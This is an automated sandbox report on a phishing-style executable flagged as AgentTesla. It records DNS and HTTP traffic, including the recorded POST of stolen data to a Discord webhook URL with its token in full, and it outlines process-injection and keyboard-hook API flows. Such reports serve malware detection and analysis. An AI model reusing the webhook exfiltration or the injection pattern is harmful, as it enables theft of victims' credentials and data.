                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                    • api.ipify.org
                    • discord.com
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.54970264.185.227.155443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    TimestampkBytes transferredDirectionData
                    2023-02-07 17:41:28 UTC0OUTGET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                    Host: api.ipify.org
                    Connection: Keep-Alive
                    2023-02-07 17:41:28 UTC0INHTTP/1.1 200 OK
                    Content-Length: 11
                    Content-Type: text/plain
                    Date: Tue, 07 Feb 2023 17:41:28 GMT
                    Vary: Origin
                    Connection: close
                    2023-02-07 17:41:28 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                    Data Ascii: 84.17.52.13


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.549703162.159.135.232443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    TimestampkBytes transferredDirectionData
                    2023-02-07 17:41:32 UTC0OUTPOST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                    Host: discord.com
                    Content-Length: 1224
                    Expect: 100-continue
                    Connection: Keep-Alive
                    2023-02-07 17:41:32 UTC0INHTTP/1.1 100 Continue
                    2023-02-07 17:41:32 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 62 34 34 36 65 36 33 35 62 35 34 33 61 64 39 37 64 65 32 35 62 30 31 65 36 39 37 39 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 61 6c 66 6f 6e 73 2d 32 38 34 39 39 32 20 32 30 32 33 2d 30 32 2d 30 38 20 30 32 2d 30 30 2d 35 36 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 62 34 34 36 65 36 33 35 62 35 34 33 61 64 39 37 64 65 32 35 62 30 31 65 36 39 37 39 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34
                    Data Ascii: ------------42b446e635b543ad97de25b01e6979b4Content-Disposition: form-data; name="filename"user-284992 2023-02-08 02-00-56.html------------42b446e635b543ad97de25b01e6979b4Content-Disposition: form-data; name="fileformat"html------------4
                    2023-02-07 17:41:32 UTC1INHTTP/1.1 404 Not Found
                    Date: Tue, 07 Feb 2023 17:41:32 GMT
                    Content-Type: application/json
                    Content-Length: 45
                    Connection: close
                    set-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    X-Content-Type-Options: nosniff
                    Set-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                    Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                    Server: cloudflare
                    CF-RAY: 795deabcc9628fdd-FRA
                    {"message": "Unknown Webhook", "code": 10015}


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:18:41:24
                    Start date:07/02/2023
                    Path:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Imagebase:0x22e8d880000
                    File size:695808 bytes
                    MD5 hash:33A5F92DEEE382035467CAFF29A8D487
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:low

                    Target ID:1
                    Start time:18:41:25
                    Start date:07/02/2023
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                    Imagebase:0xc80000
                    File size:107624 bytes
                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    Reset < >

                      Execution Graph

                      Execution Coverage:10.7%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:30
                      Total number of Limit Nodes:0
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3c68c0f11ba9e08b9c83ed6dbca21500ca125098696f42b2157fa818f288fd04
                      • Instruction ID: 5a1d460ecdadc23982de465565561170c17fec2af07a7f0082d001002e2f14a2
                      • Opcode Fuzzy Hash: 3c68c0f11ba9e08b9c83ed6dbca21500ca125098696f42b2157fa818f288fd04
                      • Instruction Fuzzy Hash: FF91E571A08B4D8FDB95DB6CE894BF97FE0EF6A310F0401BAD04DD7292DA606855CB41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 8210f49c9a331947dd7a848209ecab2764c7ea51af3423ef09c790a5415ea6a4
                      • Instruction ID: cc540ab89fb007afce74e78d8353bc751a9daa35ac91ba82abf88a840490ac5e
                      • Opcode Fuzzy Hash: 8210f49c9a331947dd7a848209ecab2764c7ea51af3423ef09c790a5415ea6a4
                      • Instruction Fuzzy Hash: C8C1F570908A1D8FDB98DF18C894BE9B7F1FB6A311F0011AAD44DE3691DB75AA84CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 70e9aa3de4f9de9e00532b368a1b60612104e081a9189cd888c2d815c9d87f86
                      • Instruction ID: d8e6c45c0276034aaab5fe44b92c3ce806bd16388372d27f296bba3155451ead
                      • Opcode Fuzzy Hash: 70e9aa3de4f9de9e00532b368a1b60612104e081a9189cd888c2d815c9d87f86
                      • Instruction Fuzzy Hash: 0DB1E370908A1D8FDB98DF58C894BE9B7F1FB69311F0011AAD44EE3691DB75AA84CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 103 7ff9a5d9a13d-7ff9a5d9a149 104 7ff9a5d9a154-7ff9a5d9a201 103->104 105 7ff9a5d9a14b-7ff9a5d9a153 103->105 108 7ff9a5d9a203-7ff9a5d9a226 104->108 109 7ff9a5d9a229-7ff9a5d9a2c2 WriteProcessMemory 104->109 105->104 108->109 110 7ff9a5d9a2c4 109->110 111 7ff9a5d9a2ca-7ff9a5d9a326 109->111 110->111
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: badfba1600d73641a3f191b31962c8b4abdb402241d5c2e5b0378f5cea29bfe3
                      • Instruction ID: 918e3fd0797c66a5314126cfb4646ec9ed9af94214dbf6cda6e7a53ef46ffb51
                      • Opcode Fuzzy Hash: badfba1600d73641a3f191b31962c8b4abdb402241d5c2e5b0378f5cea29bfe3
                      • Instruction Fuzzy Hash: 45610170908A5D8FDB98DF98C884BE9BBF1FB6A310F1041AED04DE7651DA74A985CB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 113 7ff9a5d979e2-7ff9a5d9a201 116 7ff9a5d9a203-7ff9a5d9a226 113->116 117 7ff9a5d9a229-7ff9a5d9a2c2 WriteProcessMemory 113->117 116->117 118 7ff9a5d9a2c4 117->118 119 7ff9a5d9a2ca-7ff9a5d9a326 117->119 118->119
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: fdd537519130b9b09656045c161fc32ec4cab02f2f1371bcf3a3b6761a401ac8
                      • Instruction ID: 4fe42f0fd4132ce618ee7ba05f805c3e51d891c550fd791dda2c5295b814bd44
                      • Opcode Fuzzy Hash: fdd537519130b9b09656045c161fc32ec4cab02f2f1371bcf3a3b6761a401ac8
                      • Instruction Fuzzy Hash: D151D170A08A1C8FDB98DF98C884BE9BBF1FB69311F1041AED04DE3651DA74A985CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 121 7ff9a5d99de5-7ff9a5d99df1 122 7ff9a5d99df3-7ff9a5d99dfb 121->122 123 7ff9a5d99dfc-7ff9a5d99f3d ReadProcessMemory 121->123 122->123 126 7ff9a5d99f45-7ff9a5d99f9b 123->126 127 7ff9a5d99f3f 123->127 127->126
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 340a05e97a286ed414371f472963656d4ecec5a345ca473ee40d1e5309633a6f
                      • Instruction ID: 4df35d3c98e51d0266f495898084d55c97033df3635e5793f3db4bd49668b2e6
                      • Opcode Fuzzy Hash: 340a05e97a286ed414371f472963656d4ecec5a345ca473ee40d1e5309633a6f
                      • Instruction Fuzzy Hash: 0B512170908A4C8FDB98DF58C885BE9BBF0FB6A310F1081AED04DE3251DA74A985CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 7ff9a5d979d2-7ff9a5d99f3d ReadProcessMemory 132 7ff9a5d99f45-7ff9a5d99f9b 129->132 133 7ff9a5d99f3f 129->133 133->132
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 0fe1fb6053d4ea742e27fbfa7a398c1e9d764ba1df34f5ae83cd083cad04c441
                      • Instruction ID: 11830be25886a05ba4d26cd96cb9c572987ba3a272f8c5675311bdbd641ab82d
                      • Opcode Fuzzy Hash: 0fe1fb6053d4ea742e27fbfa7a398c1e9d764ba1df34f5ae83cd083cad04c441
                      • Instruction Fuzzy Hash: BC51EF70908A1C8FDB98DF58C885BE9BBF1FB6A310F1091AED44DE3251DA70A985CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 135 7ff9a5d99f9d-7ff9a5d99fa9 136 7ff9a5d99fb4-7ff9a5d9a0e7 VirtualAllocEx 135->136 137 7ff9a5d99fab-7ff9a5d99fb3 135->137 140 7ff9a5d9a0e9 136->140 141 7ff9a5d9a0ef-7ff9a5d9a13b 136->141 137->136 140->141
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: aa68129c26677e985aaf2ddd29764c006351e91f7332afdac8cdcc4bcaced569
                      • Instruction ID: 82af1fde562ce304305e32305979525bf3a7556d73dd44d0503ad75b5a9e23d3
                      • Opcode Fuzzy Hash: aa68129c26677e985aaf2ddd29764c006351e91f7332afdac8cdcc4bcaced569
                      • Instruction Fuzzy Hash: 0D514830908A4C8FDF98DF58C894BE9BBB1FB6A314F1041AED04DE7252DA30A885CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 143 7ff9a5d97a02-7ff9a5d99ff9 145 7ff9a5d9a000-7ff9a5d9a0e7 VirtualAllocEx 143->145 146 7ff9a5d9a0e9 145->146 147 7ff9a5d9a0ef-7ff9a5d9a13b 145->147 146->147
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 248761fe76dbcf52c5a485bcfb7daaef3d8251234f8c971492484b4eef3110bf
                      • Instruction ID: 8d9ac96be33e6a39bc7df4f05d4cf6f42706f3564926dcee170d6257f99d87b2
                      • Opcode Fuzzy Hash: 248761fe76dbcf52c5a485bcfb7daaef3d8251234f8c971492484b4eef3110bf
                      • Instruction Fuzzy Hash: B3510430918A5C8FDF98DF58C844BE9BBB1FB69305F1091AED04EE3251DA70A985CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 149 7ff9a5d99c69-7ff9a5d99d04 152 7ff9a5d99d26-7ff9a5d99d8f Wow64SetThreadContext 149->152 153 7ff9a5d99d06-7ff9a5d99d23 149->153 154 7ff9a5d99d91 152->154 155 7ff9a5d99d97-7ff9a5d99de1 152->155 153->152 154->155
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 66198db966acf7bb58cde5ae163c5fcfa25276b84eeb1e871d9e7c3e3d39390c
                      • Instruction ID: f36cd94089b42fb51f059e017c7dbc13f4802fd323ce86bf8fbefb4a0794f12d
                      • Opcode Fuzzy Hash: 66198db966acf7bb58cde5ae163c5fcfa25276b84eeb1e871d9e7c3e3d39390c
                      • Instruction Fuzzy Hash: 63510870908A4D8FDB94DF99C888BEDBBB1FBA9311F10826AD048D7255D774A989CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 165 7ff9a5d979c2-7ff9a5d99d04 168 7ff9a5d99d26-7ff9a5d99d8f Wow64SetThreadContext 165->168 169 7ff9a5d99d06-7ff9a5d99d23 165->169 170 7ff9a5d99d91 168->170 171 7ff9a5d99d97-7ff9a5d99de1 168->171 169->168 170->171
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
                      • Instruction ID: 220e3c23f2d5a3c7160b2e8c8f06dd50ef81c6acba9fc81a9927c135b5497866
                      • Opcode Fuzzy Hash: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
                      • Instruction Fuzzy Hash: FE511A70D08A1D8FDB94DF99C884BE9BBF1FBA9311F10826AD049D3215D774A985CF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 157 7ff9a5d979a2-7ff9a5d99d04 160 7ff9a5d99d26-7ff9a5d99d8f Wow64SetThreadContext 157->160 161 7ff9a5d99d06-7ff9a5d99d23 157->161 162 7ff9a5d99d91 160->162 163 7ff9a5d99d97-7ff9a5d99de1 160->163 161->160 162->163
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
                      • Instruction ID: 220e3c23f2d5a3c7160b2e8c8f06dd50ef81c6acba9fc81a9927c135b5497866
                      • Opcode Fuzzy Hash: 6f294d256de33761eb7aacf3d8070914419364360a14ad3f8336bea5939214a7
                      • Instruction Fuzzy Hash: FE511A70D08A1D8FDB94DF99C884BE9BBF1FBA9311F10826AD049D3215D774A985CF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 173 7ff9a5d9a449-7ff9a5d9a51a ResumeThread 176 7ff9a5d9a522-7ff9a5d9a560 173->176 177 7ff9a5d9a51c 173->177 177->176
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 0e4015a3ef8194d7496ca7dbad61f09263d004958f4b81d5879a21a98452fc39
                      • Instruction ID: a48fe4d177ec1428c2f3d2a95da035029128534ac8d635610f4b3f3fae5d35e4
                      • Opcode Fuzzy Hash: 0e4015a3ef8194d7496ca7dbad61f09263d004958f4b81d5879a21a98452fc39
                      • Instruction Fuzzy Hash: C3410670E0864C8FDB98DF98D884BADBBF0FB5A310F10416ED049E7252DA74A886CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 7e504211a29566249bdef01c51d24e7693ab22711dda911002949f4402df2790
                      • Instruction ID: 87a4a945f41c44c645cb2268d3bd01819dbaebe25cc2f1dbc77631980302e118
                      • Opcode Fuzzy Hash: 7e504211a29566249bdef01c51d24e7693ab22711dda911002949f4402df2790
                      • Instruction Fuzzy Hash: E931E874A0860C8FDB98DF98D484BADBBB0EB5A311F10416ED04DE7251DA70A885CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 935dfe913f7fc9be671be70140ad6ad14afdba7f0da8b2d7ccbe98962d120385
                      • Instruction ID: f469aee79335e25fd5be9ce5db698cea295be462a8c5c149ea99e5995d4e1bde
                      • Opcode Fuzzy Hash: 935dfe913f7fc9be671be70140ad6ad14afdba7f0da8b2d7ccbe98962d120385
                      • Instruction Fuzzy Hash: C40213A684E7C24FD7038B749C766913FB0AF23214B0E45EBC4C5CF4A3E158A95AD762
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.300594727.00007FF9A5D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff9a5d90000_e-dekont-20230206.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08d8007aa99c548243ee3c74174482edb79cf007e3ae73b7f714a4b30514bc8c
                      • Instruction ID: 1abea9bdbbc83c3e324f42a67508a162003d489888ff18240f14da3db8927379
                      • Opcode Fuzzy Hash: 08d8007aa99c548243ee3c74174482edb79cf007e3ae73b7f714a4b30514bc8c
                      • Instruction Fuzzy Hash: E351F862A0DB8D9FE755D7BCA8947F97FE0EF57310F0401BAD089C7292DA642815C741
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:7.6%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:3.9%
                      Total number of Nodes:76
                      Total number of Limit Nodes:10
                      execution_graph 26310 6b91fa8 26311 6b91fb0 26310->26311 26312 6b91ff5 26311->26312 26316 6b92008 26311->26316 26320 6b9208a 26311->26320 26324 6b91ff8 26311->26324 26318 6b92025 26316->26318 26317 6b92098 26317->26311 26318->26317 26328 6b90290 26318->26328 26322 6b92045 26320->26322 26321 6b92098 26321->26311 26322->26321 26323 6b90290 SetWindowsHookExA 26322->26323 26323->26322 26326 6b92008 26324->26326 26325 6b92098 26325->26311 26326->26325 26327 6b90290 SetWindowsHookExA 26326->26327 26327->26326 26330 6b92210 SetWindowsHookExA 26328->26330 26331 6b9229a 26330->26331 26331->26318 26332 6b94888 26333 6b94897 26332->26333 26336 6b94094 26333->26336 26337 6b9409f 26336->26337 26340 6b9499c 26337->26340 26339 6b94d96 26339->26339 26342 6b949a7 26340->26342 26341 6b9549d 26341->26339 26342->26341 26344 6b967b8 26342->26344 26346 6b967d9 26344->26346 26345 6b967fd 26345->26341 26346->26345 26349 6b96959 26346->26349 26353 6b96968 26346->26353 26350 6b96968 26349->26350 26351 6b969ae 26350->26351 26357 6b94f84 26350->26357 26351->26345 26354 6b96975 26353->26354 26355 6b969ae 26354->26355 26356 6b94f84 LoadLibraryExW 26354->26356 26355->26345 26356->26355 26358 6b94f8f 26357->26358 26360 6b96a20 26358->26360 26361 6b94fb8 26358->26361 26360->26360 26362 6b94fc3 26361->26362 26367 6b94fc8 26362->26367 26364 6b96a8f 26371 6b9acc4 26364->26371 26370 6b94fd3 26367->26370 26368 6b971c4 26368->26364 26369 6b967b8 LoadLibraryExW 26369->26368 26370->26368 26370->26369 26372 6b96ac8 26371->26372 26373 6b9acdd 26371->26373 26372->26360 26377 6b9aef1 26373->26377 26381 6b9af00 26373->26381 26374 6b9ad15 26378 6b9af00 26377->26378 26384 6b9b068 26378->26384 26379 6b9af0a 26379->26374 26383 6b9b068 LoadLibraryExW 26381->26383 26382 6b9af0a 26382->26374 26383->26382 26385 6b9b08b 26384->26385 26387 6b9b0a3 26385->26387 26390 6b9b068 LoadLibraryExW 26385->26390 26391 6b9b258 26385->26391 26386 6b9b09b 26386->26387 26395 6b99f54 26386->26395 26387->26379 26390->26386 26393 6b9b26c 26391->26393 26392 6b9b291 26392->26386 26393->26392 26394 6b99f54 LoadLibraryExW 26393->26394 26394->26392 26396 6b9b3a0 LoadLibraryExW 26395->26396 26398 6b9b419 26396->26398 26398->26387 26399 6f4e448 26400 6f4e455 26399->26400 26401 6f4e47d 26399->26401 26407 6f4cd4c 26401->26407 26403 6f4e49e 26405 6f4e566 GlobalMemoryStatusEx 26406 6f4e596 26405->26406 26408 6f4e520 GlobalMemoryStatusEx 26407->26408 26410 6f4e49a 26408->26410 26410->26403 26410->26405

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 34 6b90290-6b9225a 37 6b9225c-6b92264 34->37 38 6b92266-6b92298 SetWindowsHookExA 34->38 37->38 39 6b9229a-6b922a0 38->39 40 6b922a1-6b922c1 38->40 39->40
                      APIs
                      • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID: o
                      • API String ID: 2559412058-252678980
                      • Opcode ID: e71207823ee3bef0f8a9c8e9f20963b7d21d24f2f1b805c6dcddf13716f2c7dc
                      • Instruction ID: e8bf6a7f58cad0aec8c312671ed17a0c7c312a9def429330044eb7b90f79bde6
